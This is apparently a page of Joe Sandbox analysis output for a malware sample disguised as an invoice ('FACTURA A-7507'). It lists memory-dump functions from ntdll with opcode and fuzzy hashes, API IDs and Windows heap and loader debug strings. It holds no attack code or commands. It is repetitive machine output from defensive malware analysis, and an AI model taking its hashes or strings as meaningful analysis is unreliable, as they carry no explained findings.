                                                                                                                                                                                                                          • Instruction ID: 3cf41b6a892e9189870410f0a860cea1c27d27d279fffc392f72b0f42bc0ceea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9674e9093770f069c7250674e5a89fd9ee518b1a0c963b617b6eabe40d8011d1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79417EBAA00309ABDB09CF99C884ADEBBB5FF58754F114069ED05B7340DB71AE41CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-3492000579
                                                                                                                                                                                                                          • Opcode ID: a8222d56308e1d3477b14a34dcbb69482854c29b826ea8e88532ebe73576ed2c
                                                                                                                                                                                                                          • Instruction ID: 05cad8f703a59daa93a3dcf28ef01f01055136aac179a2de782019cc815a77fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8222d56308e1d3477b14a34dcbb69482854c29b826ea8e88532ebe73576ed2c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3471BB75A14744EFCB19CFA8D4A0AA9FBF2FF49700F44809AE445AB352CB359942CF50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35489854, 35489895
                                                                                                                                                                                                                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35489843
                                                                                                                                                                                                                          • LdrpLoadShimEngine, xrefs: 3548984A, 3548988B
                                                                                                                                                                                                                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35489885
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3589223738
                                                                                                                                                                                                                          • Opcode ID: 13626c58d6deceed8a46a54fb39f3e2f33e2ff8b9bf3f352ccb3b07374bb5c40
                                                                                                                                                                                                                          • Instruction ID: f1194905077ffa5832c6c90e7cfa3ee9ca13458b7f8ec53f2b94f29f66a97542
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13626c58d6deceed8a46a54fb39f3e2f33e2ff8b9bf3f352ccb3b07374bb5c40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8551FF36B203589FDB08DBA8D858E9D7BB6BB44704F45056AE851BF295CF70AD42CB80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-3224558752
                                                                                                                                                                                                                          • Opcode ID: 9bd0b4f9868bb8ed64687ce53a5a71f750e531c16604aa83b251eb9b467f5307
                                                                                                                                                                                                                          • Instruction ID: 9d75b0ea726f4723c9e4612169325c821f91db588c08f39e3822732895003156
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9bd0b4f9868bb8ed64687ce53a5a71f750e531c16604aa83b251eb9b467f5307
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F4137B4614700EFE70ECF64C445B8AB7B4FF40320F1589ADE80657381CB78AA81CB91
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ---------------------------------------, xrefs: 354DEDF9
                                                                                                                                                                                                                          • Entry Heap Size , xrefs: 354DEDED
                                                                                                                                                                                                                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 354DEDE3
                                                                                                                                                                                                                          • HEAP: , xrefs: 354DECDD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                                                          • API String ID: 3446177414-1102453626
                                                                                                                                                                                                                          • Opcode ID: 1d026c86780f3b2a1b34472aa3a3b8f486fd1d495b909587c98ebfef225488ee
                                                                                                                                                                                                                          • Instruction ID: 8871aca4285000af38e65bf6f9a3e313521b0278fe708893170d2ec29962f23b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d026c86780f3b2a1b34472aa3a3b8f486fd1d495b909587c98ebfef225488ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E417A39A10226DFC708CF15C49490ABBF6FB4965572984AEE409AB312CF31EC52CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1222099010
                                                                                                                                                                                                                          • Opcode ID: 0aff54e7eff1b2b6bf961a1520c9938e0efa399eec25741ce1b7c6dbeb18cb99
                                                                                                                                                                                                                          • Instruction ID: ce50712697d9972c521886fe24d6e1fb9fee4d0140348a1e2e10926282cc42ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aff54e7eff1b2b6bf961a1520c9938e0efa399eec25741ce1b7c6dbeb18cb99
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF313335214794EFE71ECB24C449F8A7BB5FF01760F0648D9E442577A2CBA9AA81CB12
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$@
                                                                                                                                                                                                                          • API String ID: 3446177414-1194432280
                                                                                                                                                                                                                          • Opcode ID: 5740f6171d5301cd6f15c7241c522c4974112dccb8de2067d0c2e7915172393b
                                                                                                                                                                                                                          • Instruction ID: 550393f16bd1a99974d2da47ee72aec7fd230e311dd334dde4c6ed7b262c5250
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5740f6171d5301cd6f15c7241c522c4974112dccb8de2067d0c2e7915172393b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35814BB2D052699BDB29CF54CC41BDEB7B8AF08710F0041EAE91AB7250D7709E85DFA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 354A344A, 354A3476
                                                                                                                                                                                                                          • LdrpFindDllActivationContext, xrefs: 354A3440, 354A346C
                                                                                                                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 354A3439
                                                                                                                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 354A3466
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3779518884
                                                                                                                                                                                                                          • Opcode ID: 069e43eaaa18a3dcc45bb5bd3ac374aa3fff168476515d460387e10c39954815
                                                                                                                                                                                                                          • Instruction ID: a3711c569a3745745eab4a95e3f758c56649df2c5731a95ad9cd9bf3ce742c7d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 069e43eaaa18a3dcc45bb5bd3ac374aa3fff168476515d460387e10c39954815
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56311BB6A04751AFEF1DDB04E8E4F55B2B5BB4179CF4381AAE80167350EBA09D808791
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DG@5, xrefs: 35452382
                                                                                                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3549A79F
                                                                                                                                                                                                                          • LdrpDynamicShimModule, xrefs: 3549A7A5
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3549A7AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: DG@5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-3953938812
                                                                                                                                                                                                                          • Opcode ID: 2c1d8d0148160c14023718991554819a07aecfebd30942183f351bbd4bbd1524
                                                                                                                                                                                                                          • Instruction ID: 69868bb2854a498c940a88ebcea1cbc5d553a6c98f4cec84754a6723c6551d3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1d8d0148160c14023718991554819a07aecfebd30942183f351bbd4bbd1524
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31A476A14200ABE71CDF6AD886E997BB6FB84B50F15049EFD01A7350DF70A943CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                                                                                                                          • String ID: ZKP
                                                                                                                                                                                                                          • API String ID: 4281723722-2362050067
                                                                                                                                                                                                                          • Opcode ID: e94cdd5a8ad176cefc3cb06cdd384124acb8a83e63edad310519095b32a07a0d
                                                                                                                                                                                                                          • Instruction ID: 7b4a8088ec0d34bd00dcc67139f0067f67275898aa85ceee7049ebb1d960829b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94cdd5a8ad176cefc3cb06cdd384124acb8a83e63edad310519095b32a07a0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB31F276E11218DFCF09DFA8E844A9EBBF1BB48720F10416AE911B7390DB356901CF90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 3446177414-3610490719
                                                                                                                                                                                                                          • Opcode ID: 14a9a03428d9eaacd82956826ab8994b920ab7d1d0b06acee91bec5348488968
                                                                                                                                                                                                                          • Instruction ID: 068a41b7c8c63fb34ee1e0ddad7d380163eb35d1fae9917c9280fbdf3d96b1ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14a9a03428d9eaacd82956826ab8994b920ab7d1d0b06acee91bec5348488968
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2991F471308760BFE31DCB24C842B2AB7B6BF44A40F90059DE8459B381EB75E856CB92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 35499F1C
                                                                                                                                                                                                                          • LdrpCheckModule, xrefs: 35499F24
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 35499F2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-161242083
                                                                                                                                                                                                                          • Opcode ID: bf485120fe70aa2a4a40665b07bd15579c310b7cd5804cdd1a01610e8b4519f9
                                                                                                                                                                                                                          • Instruction ID: dda009b66453814c9b169f2d99219d5f584e6e19e6c5d1587e13e4cc5f5470ea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf485120fe70aa2a4a40665b07bd15579c310b7cd5804cdd1a01610e8b4519f9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D71E679A002059FEB0CDFA8C885BAEB7F1FB44714F1448ADE405E7350EB74A942CB50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 354A80E9
                                                                                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 354A80F3
                                                                                                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 354A80E2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                                                                                                                          • Opcode ID: b26f53068aa9832b37ffb08bfcf49616d497a2c30f3c0ad6cb5203585a31eeb3
                                                                                                                                                                                                                          • Instruction ID: 273329cb07359b948519429570df30f9aa12a9be90340a7269e92f2fbb10bb18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b26f53068aa9832b37ffb08bfcf49616d497a2c30f3c0ad6cb5203585a31eeb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2341DFB6615300ABD718DB64E840B4B77F9FF44A54F01986EB898A7250EF70E8018B96
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 354B4508
                                                                                                                                                                                                                          • LdrpCheckRedirection, xrefs: 354B450F
                                                                                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 354B4519
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                                                                                                                          • Opcode ID: 50fd08ef2854c33d8f405d377fd7c3d1cbf4cce249da7ae2f97bb0958d38888e
                                                                                                                                                                                                                          • Instruction ID: 26aac743613ca588df052f89c192081a28b5bc952e2c0053c5db2cad2f4e66c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50fd08ef2854c33d8f405d377fd7c3d1cbf4cce249da7ae2f97bb0958d38888e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB41F4766043109BCF18CF58E840A1677E6BF48750F0506A9ECC9A7352EBB0E8219BA2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: Wow64 Emulation Layer
                                                                                                                                                                                                                          • API String ID: 3446177414-921169906
                                                                                                                                                                                                                          • Opcode ID: 14350254844092176c18ddf56d026033dd25f32a7684e93a9abc3ddf6fddcb39
                                                                                                                                                                                                                          • Instruction ID: 03a65e655767178c68e0d887845261ae7bc56626b6dc2865d54b24088be9be85
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14350254844092176c18ddf56d026033dd25f32a7684e93a9abc3ddf6fddcb39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6215EB5A0014DBFAF09AAA1CD88CFFBB7DEF44689B144059FE01A2104E7309E01DB30
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b09b48a718ae1bb393f00e6d8f5421b60afb942cc20e18540e969e92491b4674
                                                                                                                                                                                                                          • Instruction ID: ea390404939d6069c3994c4bfe6e959bac19ab1c2d31783b43d9b051215d5602
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b09b48a718ae1bb393f00e6d8f5421b60afb942cc20e18540e969e92491b4674
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE1E2B5D00708EFDB29CFA9D980A8DBBF1BF48324F14496AE546A7364DB70A841CF11
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 5173f498a1483993b06029b6d92382540b0f323f681b2a3a183adc201cacff20
                                                                                                                                                                                                                          • Instruction ID: 9b8b3f4a520a4a63516e67439c54c2f2a467676e27555f0864be6e4ee4dac7e7
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5173f498a1483993b06029b6d92382540b0f323f681b2a3a183adc201cacff20
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB716676E002299FEF49CFA5D884ADDBBB5BF58314F14402AE911EB340D734A916CF50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 2fbd1fcd191487a9d2814b90f7c741b93b5c628f54b6c20a8d52746fab6d7fb5
                                                                                                                                                                                                                          • Instruction ID: a24ec8094add8d751f8d437978420a86e64f6ff85232f7fe76f0cd620a874acf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fbd1fcd191487a9d2814b90f7c741b93b5c628f54b6c20a8d52746fab6d7fb5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0515A79714A16DFEB08CE19C8A0A1AB7F2BB89350B50456DED06DB710DBB1BC49CF80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3446177414-0
                                                                                                                                                                                                                          • Opcode ID: 50277fd671c0bbc3debc172a6f6981c0149435c37697d4f10961af02bd41ad60
                                                                                                                                                                                                                          • Instruction ID: 087ca1b4c3639c9ab7f732280bac8f41cd1fee45f474e37af9401c93a52bf84a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50277fd671c0bbc3debc172a6f6981c0149435c37697d4f10961af02bd41ad60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C95120B6E04218AFEF48CF99D840ADDBBB2BF58354F14806AE815BB350DB34A941CF50
                                                                                                                                                                                                                          Strings
